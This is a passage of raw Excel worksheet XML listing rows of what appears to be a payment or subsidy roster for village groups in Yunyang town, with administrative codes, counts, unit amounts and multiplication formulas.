        <v>325</v>
      </c>
      <c r="I1508" s="24">
        <f t="shared" si="23"/>
        <v>650</v>
      </c>
      <c r="J1508" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1508" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1509" customHeight="1" spans="1:11">
      <c r="A1509" s="23" t="s">
        <v>4058</v>
      </c>
      <c r="B1509" s="24" t="str">
        <f>B1508</f>
        <v>云阳镇</v>
      </c>
      <c r="C1509" s="24" t="str">
        <f>C1508</f>
        <v>小关九组</v>
      </c>
      <c r="D1509" s="23" t="s">
        <v>4059</v>
      </c>
      <c r="E1509" s="23" t="s">
        <v>4060</v>
      </c>
      <c r="F1509" s="24" t="str">
        <f>F1508</f>
        <v>4113210521</v>
      </c>
      <c r="G1509" s="24"/>
      <c r="H1509" s="24"/>
      <c r="I1509" s="24">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="J1509" s="24"/>
      <c r="K1509" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1510" customHeight="1" spans="1:11">
      <c r="A1510" s="23" t="s">
        <v>4061</v>
      </c>
      <c r="B1510" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1510" s="24" t="s">
        <v>3589</v>
      </c>
      <c r="D1510" s="24" t="s">
        <v>4062</v>
      </c>
      <c r="E1510" s="24" t="s">
        <v>3982</v>
      </c>
      <c r="F1510" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1510" s="24">
        <v>1</v>
      </c>
      <c r="H1510" s="25">
        <v>365</v>
      </c>
      <c r="I1510" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1510" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1510" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1511" customHeight="1" spans="1:11">
      <c r="A1511" s="23" t="s">
        <v>4063</v>
      </c>
      <c r="B1511" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1511" s="24" t="s">
        <v>3721</v>
      </c>
      <c r="D1511" s="24" t="s">
        <v>4064</v>
      </c>
      <c r="E1511" s="24" t="s">
        <v>3752</v>
      </c>
      <c r="F1511" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1511" s="24">
        <v>1</v>
      </c>
      <c r="H1511" s="25">
        <v>365</v>
      </c>
      <c r="I1511" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1511" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1511" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1512" customHeight="1" spans="1:11">
      <c r="A1512" s="23" t="s">
        <v>4065</v>
      </c>
      <c r="B1512" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1512" s="24" t="s">
        <v>3596</v>
      </c>
      <c r="D1512" s="24" t="s">
        <v>4066</v>
      </c>
      <c r="E1512" s="24" t="s">
        <v>3557</v>
      </c>
      <c r="F1512" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1512" s="24">
        <v>1</v>
      </c>
      <c r="H1512" s="25">
        <v>365</v>
      </c>
      <c r="I1512" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1512" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1512" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1513" customHeight="1" spans="1:11">
      <c r="A1513" s="23" t="s">
        <v>4067</v>
      </c>
      <c r="B1513" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1513" s="24" t="s">
        <v>3596</v>
      </c>
      <c r="D1513" s="24" t="s">
        <v>4068</v>
      </c>
      <c r="E1513" s="24" t="s">
        <v>4069</v>
      </c>
      <c r="F1513" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1513" s="24">
        <v>1</v>
      </c>
      <c r="H1513" s="25">
        <v>365</v>
      </c>
      <c r="I1513" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1513" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1513" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1514" customHeight="1" spans="1:11">
      <c r="A1514" s="23" t="s">
        <v>4070</v>
      </c>
      <c r="B1514" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1514" s="24" t="s">
        <v>3589</v>
      </c>
      <c r="D1514" s="24" t="s">
        <v>4071</v>
      </c>
      <c r="E1514" s="24" t="s">
        <v>3776</v>
      </c>
      <c r="F1514" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1514" s="24">
        <v>1</v>
      </c>
      <c r="H1514" s="25">
        <v>365</v>
      </c>
      <c r="I1514" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1514" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1514" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1515" customHeight="1" spans="1:11">
      <c r="A1515" s="23" t="s">
        <v>4072</v>
      </c>
      <c r="B1515" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1515" s="24" t="s">
        <v>3589</v>
      </c>
      <c r="D1515" s="24" t="s">
        <v>4073</v>
      </c>
      <c r="E1515" s="24" t="s">
        <v>4074</v>
      </c>
      <c r="F1515" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1515" s="24">
        <v>2</v>
      </c>
      <c r="H1515" s="25">
        <v>325</v>
      </c>
      <c r="I1515" s="24">
        <f t="shared" si="23"/>
        <v>650</v>
      </c>
      <c r="J1515" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1515" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1516" customHeight="1" spans="1:11">
      <c r="A1516" s="23" t="s">
        <v>4075</v>
      </c>
      <c r="B1516" s="24" t="str">
        <f>B1515</f>
        <v>云阳镇</v>
      </c>
      <c r="C1516" s="24" t="str">
        <f>C1515</f>
        <v>老城一组</v>
      </c>
      <c r="D1516" s="23" t="s">
        <v>4076</v>
      </c>
      <c r="E1516" s="23" t="s">
        <v>4077</v>
      </c>
      <c r="F1516" s="24" t="str">
        <f>F1515</f>
        <v>4113210523</v>
      </c>
      <c r="G1516" s="24"/>
      <c r="H1516" s="24"/>
      <c r="I1516" s="24">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="J1516" s="24"/>
      <c r="K1516" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1517" customHeight="1" spans="1:11">
      <c r="A1517" s="23" t="s">
        <v>4078</v>
      </c>
      <c r="B1517" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1517" s="24" t="s">
        <v>4079</v>
      </c>
      <c r="D1517" s="24" t="s">
        <v>4080</v>
      </c>
      <c r="E1517" s="24" t="s">
        <v>3637</v>
      </c>
      <c r="F1517" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1517" s="24">
        <v>3</v>
      </c>
      <c r="H1517" s="25">
        <v>320</v>
      </c>
      <c r="I1517" s="24">
        <f t="shared" si="23"/>
        <v>960</v>
      </c>
      <c r="J1517" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1517" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1518" customHeight="1" spans="1:11">
      <c r="A1518" s="23" t="s">
        <v>4081</v>
      </c>
      <c r="B1518" s="24" t="str">
        <f>B1517</f>
        <v>云阳镇</v>
      </c>
      <c r="C1518" s="24" t="str">
        <f>C1517</f>
        <v>云阳老城一组</v>
      </c>
      <c r="D1518" s="23" t="s">
        <v>4082</v>
      </c>
      <c r="E1518" s="23" t="s">
        <v>3493</v>
      </c>
      <c r="F1518" s="24" t="str">
        <f>F1517</f>
        <v>4113210523</v>
      </c>
      <c r="G1518" s="24"/>
      <c r="H1518" s="24"/>
      <c r="I1518" s="24">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="J1518" s="24"/>
      <c r="K1518" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1519" customHeight="1" spans="1:11">
      <c r="A1519" s="23" t="s">
        <v>4083</v>
      </c>
      <c r="B1519" s="24" t="str">
        <f>B1518</f>
        <v>云阳镇</v>
      </c>
      <c r="C1519" s="24" t="str">
        <f>C1518</f>
        <v>云阳老城一组</v>
      </c>
      <c r="D1519" s="23" t="s">
        <v>4084</v>
      </c>
      <c r="E1519" s="30" t="s">
        <v>4085</v>
      </c>
      <c r="F1519" s="24" t="str">
        <f>F1518</f>
        <v>4113210523</v>
      </c>
      <c r="G1519" s="24"/>
      <c r="H1519" s="24"/>
      <c r="I1519" s="24">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="J1519" s="24"/>
      <c r="K1519" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1520" customHeight="1" spans="1:11">
      <c r="A1520" s="23" t="s">
        <v>4086</v>
      </c>
      <c r="B1520" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1520" s="24" t="s">
        <v>4087</v>
      </c>
      <c r="D1520" s="24" t="s">
        <v>4088</v>
      </c>
      <c r="E1520" s="24" t="s">
        <v>3922</v>
      </c>
      <c r="F1520" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1520" s="24">
        <v>1</v>
      </c>
      <c r="H1520" s="25">
        <v>365</v>
      </c>
      <c r="I1520" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1520" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1520" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1521" customHeight="1" spans="1:12">
      <c r="A1521" s="23" t="s">
        <v>4089</v>
      </c>
      <c r="B1521" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1521" s="24" t="s">
        <v>4090</v>
      </c>
      <c r="D1521" s="24" t="s">
        <v>4091</v>
      </c>
      <c r="E1521" s="24" t="s">
        <v>4092</v>
      </c>
      <c r="F1521" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1521" s="24">
        <v>1</v>
      </c>
      <c r="H1521" s="25">
        <v>365</v>
      </c>
      <c r="I1521" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1521" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1521" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1522" customHeight="1" spans="1:12">
      <c r="A1522" s="23" t="s">
        <v>4093</v>
      </c>
      <c r="B1522" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1522" s="24" t="s">
        <v>3977</v>
      </c>
      <c r="D1522" s="24" t="s">
        <v>4094</v>
      </c>
      <c r="E1522" s="24" t="s">
        <v>4092</v>
      </c>
      <c r="F1522" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1522" s="24">
        <v>1</v>
      </c>
      <c r="H1522" s="25">
        <v>365</v>
      </c>
      <c r="I1522" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1522" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1522" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1523" customHeight="1" spans="1:12">
      <c r="A1523" s="23" t="s">
        <v>4095</v>
      </c>
      <c r="B1523" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1523" s="24" t="s">
        <v>3977</v>
      </c>
      <c r="D1523" s="24" t="s">
        <v>4096</v>
      </c>
      <c r="E1523" s="24" t="s">
        <v>3982</v>
      </c>
      <c r="F1523" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1523" s="24">
        <v>1</v>
      </c>
      <c r="H1523" s="25">
        <v>365</v>
      </c>
      <c r="I1523" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1523" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1523" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1524" customHeight="1" spans="1:12">
      <c r="A1524" s="23" t="s">
        <v>4097</v>
      </c>
      <c r="B1524" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1524" s="24" t="s">
        <v>3977</v>
      </c>
      <c r="D1524" s="24" t="s">
        <v>4098</v>
      </c>
      <c r="E1524" s="24" t="s">
        <v>4099</v>
      </c>
      <c r="F1524" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1524" s="24">
        <v>2</v>
      </c>
      <c r="H1524" s="25">
        <v>325</v>
      </c>
      <c r="I1524" s="24">
        <f t="shared" si="23"/>
        <v>650</v>
      </c>
      <c r="J1524" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1524" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1525" s="4" customFormat="1" customHeight="1" spans="1:12">
      <c r="A1525" s="23" t="s">
        <v>4100</v>
      </c>
      <c r="B1525" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1525" s="24" t="s">
        <v>3977</v>
      </c>
      <c r="D1525" s="24" t="s">
        <v>4101</v>
      </c>
      <c r="E1525" s="24" t="s">
        <v>4102</v>
      </c>
      <c r="F1525" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1525" s="24"/>
      <c r="H1525" s="24"/>
      <c r="I1525" s="24">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="J1525" s="5" t="s">
        <v>1242</v>
      </c>
      <c r="K1525" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L1525" s="8"/>
    </row>
    <row r="1526" customHeight="1" spans="1:12">
      <c r="A1526" s="23" t="s">
        <v>4103</v>
      </c>
      <c r="B1526" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1526" s="24" t="s">
        <v>3989</v>
      </c>
      <c r="D1526" s="24" t="s">
        <v>4104</v>
      </c>
      <c r="E1526" s="24" t="s">
        <v>4105</v>
      </c>
      <c r="F1526" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1526" s="24">
        <v>1</v>
      </c>
      <c r="H1526" s="25">
        <v>365</v>
      </c>
      <c r="I1526" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1526" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1526" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1527" customHeight="1" spans="1:12">
      <c r="A1527" s="23" t="s">
        <v>4106</v>
      </c>
      <c r="B1527" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1527" s="24" t="s">
        <v>3989</v>
      </c>
      <c r="D1527" s="24" t="s">
        <v>4107</v>
      </c>
      <c r="E1527" s="24" t="s">
        <v>3727</v>
      </c>
      <c r="F1527" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1527" s="24">
        <v>1</v>
      </c>
      <c r="H1527" s="25">
        <v>365</v>
      </c>
      <c r="I1527" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1527" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1527" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1528" customHeight="1" spans="1:12">
      <c r="A1528" s="23" t="s">
        <v>4108</v>
      </c>
      <c r="B1528" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1528" s="24" t="s">
        <v>3989</v>
      </c>
      <c r="D1528" s="24" t="s">
        <v>4109</v>
      </c>
      <c r="E1528" s="24" t="s">
        <v>1079</v>
      </c>
      <c r="F1528" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1528" s="24">
        <v>1</v>
      </c>
      <c r="H1528" s="25">
        <v>365</v>
      </c>
      <c r="I1528" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1528" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1528" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1529" customHeight="1" spans="1:12">
      <c r="A1529" s="23" t="s">
        <v>4110</v>
      </c>
      <c r="B1529" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1529" s="24" t="s">
        <v>3984</v>
      </c>
      <c r="D1529" s="24" t="s">
        <v>4111</v>
      </c>
      <c r="E1529" s="24" t="s">
        <v>4112</v>
      </c>
      <c r="F1529" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1529" s="24">
        <v>1</v>
      </c>
      <c r="H1529" s="25">
        <v>365</v>
      </c>
      <c r="I1529" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1529" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1529" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1530" customHeight="1" spans="1:12">
      <c r="A1530" s="23" t="s">
        <v>4113</v>
      </c>
      <c r="B1530" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1530" s="24" t="s">
        <v>3544</v>
      </c>
      <c r="D1530" s="24" t="s">
        <v>4114</v>
      </c>
      <c r="E1530" s="24" t="s">
        <v>3832</v>
      </c>
      <c r="F1530" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1530" s="24">
        <v>1</v>
      </c>
      <c r="H1530" s="25">
        <v>365</v>
      </c>
      <c r="I1530" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1530" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1530" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1531" customHeight="1" spans="1:12">
      <c r="A1531" s="23" t="s">
        <v>4115</v>
      </c>
      <c r="B1531" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1531" s="24" t="s">
        <v>4090</v>
      </c>
      <c r="D1531" s="24" t="s">
        <v>4116</v>
      </c>
      <c r="E1531" s="24" t="s">
        <v>4117</v>
      </c>
      <c r="F1531" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1531" s="24">
        <v>1</v>
      </c>
      <c r="H1531" s="25">
        <v>365</v>
      </c>
      <c r="I1531" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1531" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1531" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1532" customHeight="1" spans="1:12">
      <c r="A1532" s="23" t="s">
        <v>4118</v>
      </c>
      <c r="B1532" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1532" s="24" t="s">
        <v>4090</v>
      </c>
      <c r="D1532" s="24" t="s">
        <v>4119</v>
      </c>
      <c r="E1532" s="24" t="s">
        <v>4120</v>
      </c>
      <c r="F1532" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1532" s="24">
        <v>1</v>
      </c>
      <c r="H1532" s="25">
        <v>365</v>
      </c>
      <c r="I1532" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1532" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1532" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1533" customHeight="1" spans="1:12">
      <c r="A1533" s="23" t="s">
        <v>4121</v>
      </c>
      <c r="B1533" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1533" s="24" t="s">
        <v>3977</v>
      </c>
      <c r="D1533" s="24" t="s">
        <v>4122</v>
      </c>
      <c r="E1533" s="24" t="s">
        <v>3594</v>
      </c>
      <c r="F1533" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1533" s="24">
        <v>1</v>
      </c>
      <c r="H1533" s="25">
        <v>365</v>
      </c>
      <c r="I1533" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1533" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1533" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1534" customHeight="1" spans="1:12">
      <c r="A1534" s="23" t="s">
        <v>4123</v>
      </c>
      <c r="B1534" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1534" s="24" t="s">
        <v>3977</v>
      </c>
      <c r="D1534" s="24" t="s">
        <v>4124</v>
      </c>
      <c r="E1534" s="24" t="s">
        <v>4125</v>
      </c>
      <c r="F1534" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1534" s="24">
        <v>1</v>
      </c>
      <c r="H1534" s="25">
        <v>365</v>
      </c>
      <c r="I1534" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1534" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1534" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1535" customHeight="1" spans="1:12">
      <c r="A1535" s="23" t="s">
        <v>4126</v>
      </c>
      <c r="B1535" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1535" s="24" t="s">
        <v>3977</v>
      </c>
      <c r="D1535" s="24" t="s">
        <v>4127</v>
      </c>
      <c r="E1535" s="24" t="s">
        <v>4128</v>
      </c>
      <c r="F1535" s="24" t="s">
        <v>3547</v>
      </c>
      <c r="G1535" s="24">
        <v>2</v>
      </c>
      <c r="H1535" s="25">
        <v>325</v>
      </c>
      <c r="I1535" s="24">
        <f t="shared" si="23"/>
        <v>650</v>
      </c>
      <c r="J1535" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1535" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1536" customHeight="1" spans="1:12">
      <c r="A1536" s="23" t="s">
        <v>4129</v>
      </c>
      <c r="B1536" s="24" t="str">
        <f>B1535</f>
        <v>云阳镇</v>
      </c>
      <c r="C1536" s="24" t="str">
        <f>C1535</f>
        <v>云阳小关</v>
      </c>
      <c r="D1536" s="23" t="s">
        <v>4130</v>
      </c>
      <c r="E1536" s="23" t="s">
        <v>2494</v>
      </c>
      <c r="F1536" s="24" t="str">
        <f>F1535</f>
        <v>4113210521</v>
      </c>
      <c r="G1536" s="24"/>
      <c r="H1536" s="24"/>
      <c r="I1536" s="24">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="J1536" s="24"/>
      <c r="K1536" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1537" customHeight="1" spans="1:11">
      <c r="A1537" s="23" t="s">
        <v>4131</v>
      </c>
      <c r="B1537" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1537" s="24" t="s">
        <v>4132</v>
      </c>
      <c r="D1537" s="24" t="s">
        <v>4133</v>
      </c>
      <c r="E1537" s="24" t="s">
        <v>3848</v>
      </c>
      <c r="F1537" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G1537" s="24">
        <v>1</v>
      </c>
      <c r="H1537" s="25">
        <v>365</v>
      </c>
      <c r="I1537" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1537" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1537" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1538" customHeight="1" spans="1:11">
      <c r="A1538" s="23" t="s">
        <v>4134</v>
      </c>
      <c r="B1538" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1538" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="D1538" s="24" t="s">
        <v>4135</v>
      </c>
      <c r="E1538" s="24" t="s">
        <v>3743</v>
      </c>
      <c r="F1538" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1538" s="24">
        <v>1</v>
      </c>
      <c r="H1538" s="25">
        <v>365</v>
      </c>
      <c r="I1538" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1538" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1538" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1539" customHeight="1" spans="1:11">
      <c r="A1539" s="23" t="s">
        <v>4136</v>
      </c>
      <c r="B1539" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1539" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="D1539" s="24" t="s">
        <v>4137</v>
      </c>
      <c r="E1539" s="24" t="s">
        <v>3959</v>
      </c>
      <c r="F1539" s="24" t="s">
        <v>3581</v>
      </c>
      <c r="G1539" s="24">
        <v>1</v>
      </c>
      <c r="H1539" s="25">
        <v>365</v>
      </c>
      <c r="I1539" s="24">
        <f t="shared" si="23"/>
        <v>365</v>
      </c>
      <c r="J1539" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1539" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1540" customHeight="1" spans="1:11">
      <c r="A1540" s="23" t="s">
        <v>4138</v>
      </c>
      <c r="B1540" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1540" s="24" t="s">
        <v>3980</v>
      </c>
      <c r="D1540" s="24" t="s">
        <v>4139</v>
      </c>
      <c r="E1540" s="24" t="s">
        <v>4140</v>
      </c>
      <c r="F1540" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1540" s="24">
        <v>1</v>
      </c>
      <c r="H1540" s="25">
        <v>365</v>
      </c>
      <c r="I1540" s="24">
        <f t="shared" ref="I1540:I1603" si="24">H1540*G1540</f>
        <v>365</v>
      </c>
      <c r="J1540" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1540" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1541" customHeight="1" spans="1:11">
      <c r="A1541" s="23" t="s">
        <v>4141</v>
      </c>
      <c r="B1541" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1541" s="24" t="s">
        <v>3811</v>
      </c>
      <c r="D1541" s="24" t="s">
        <v>4142</v>
      </c>
      <c r="E1541" s="24" t="s">
        <v>3637</v>
      </c>
      <c r="F1541" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1541" s="24">
        <v>1</v>
      </c>
      <c r="H1541" s="25">
        <v>365</v>
      </c>
      <c r="I1541" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1541" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1541" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1542" customHeight="1" spans="1:11">
      <c r="A1542" s="23" t="s">
        <v>4143</v>
      </c>
      <c r="B1542" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1542" s="24" t="s">
        <v>4144</v>
      </c>
      <c r="D1542" s="24" t="s">
        <v>4145</v>
      </c>
      <c r="E1542" s="24" t="s">
        <v>4146</v>
      </c>
      <c r="F1542" s="24" t="s">
        <v>3567</v>
      </c>
      <c r="G1542" s="24">
        <v>1</v>
      </c>
      <c r="H1542" s="25">
        <v>365</v>
      </c>
      <c r="I1542" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1542" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1542" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1543" customHeight="1" spans="1:11">
      <c r="A1543" s="23" t="s">
        <v>4147</v>
      </c>
      <c r="B1543" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1543" s="24" t="s">
        <v>4144</v>
      </c>
      <c r="D1543" s="24" t="s">
        <v>4148</v>
      </c>
      <c r="E1543" s="24" t="s">
        <v>3623</v>
      </c>
      <c r="F1543" s="24" t="s">
        <v>4149</v>
      </c>
      <c r="G1543" s="24">
        <v>1</v>
      </c>
      <c r="H1543" s="24">
        <v>335</v>
      </c>
      <c r="I1543" s="24">
        <f t="shared" si="24"/>
        <v>335</v>
      </c>
      <c r="J1543" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1543" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1544" customHeight="1" spans="1:11">
      <c r="A1544" s="23" t="s">
        <v>4150</v>
      </c>
      <c r="B1544" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1544" s="24" t="s">
        <v>3639</v>
      </c>
      <c r="D1544" s="24" t="s">
        <v>4151</v>
      </c>
      <c r="E1544" s="24" t="s">
        <v>3631</v>
      </c>
      <c r="F1544" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1544" s="24">
        <v>1</v>
      </c>
      <c r="H1544" s="25">
        <v>365</v>
      </c>
      <c r="I1544" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1544" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1544" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1545" customHeight="1" spans="1:11">
      <c r="A1545" s="23" t="s">
        <v>4152</v>
      </c>
      <c r="B1545" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1545" s="24" t="s">
        <v>4153</v>
      </c>
      <c r="D1545" s="24" t="s">
        <v>4154</v>
      </c>
      <c r="E1545" s="24" t="s">
        <v>4155</v>
      </c>
      <c r="F1545" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1545" s="24">
        <v>1</v>
      </c>
      <c r="H1545" s="25">
        <v>365</v>
      </c>
      <c r="I1545" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1545" s="24">
        <v>45017</v>
      </c>
      <c r="K1545" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1546" customHeight="1" spans="1:11">
      <c r="A1546" s="23" t="s">
        <v>4156</v>
      </c>
      <c r="B1546" s="24" t="s">
        <v>3543</v>
      </c>
      <c r="C1546" s="24" t="s">
        <v>3639</v>
      </c>
      <c r="D1546" s="24" t="s">
        <v>4157</v>
      </c>
      <c r="E1546" s="24" t="s">
        <v>3922</v>
      </c>
      <c r="F1546" s="24" t="s">
        <v>3576</v>
      </c>
      <c r="G1546" s="24">
        <v>1</v>
      </c>
      <c r="H1546" s="25">
        <v>365</v>
      </c>
      <c r="I1546" s="24">
        <f t="shared" si="24"/>
        <v>365</v>
      </c>
      <c r="J1546" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K1546" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1547" customHeight="1" spans="1:11">
      <c r="A1547" s="23" t="s">
        <v>4158</v>
      </c>
